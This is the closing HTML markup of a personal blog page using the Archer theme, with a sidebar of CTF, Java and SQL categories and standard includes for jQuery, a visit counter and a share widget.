        <span class="sidebar-category-name" data-categories="CTF"><span class="iconfont-archer">&#xe60a;</span>CTF</span>
    
        <span class="sidebar-category-name" data-categories="JAVA"><span class="iconfont-archer">&#xe60a;</span>JAVA</span>
    
        <span class="sidebar-category-name" data-categories="SQL"><span class="iconfont-archer">&#xe60a;</span>SQL</span>
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "Laurel"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


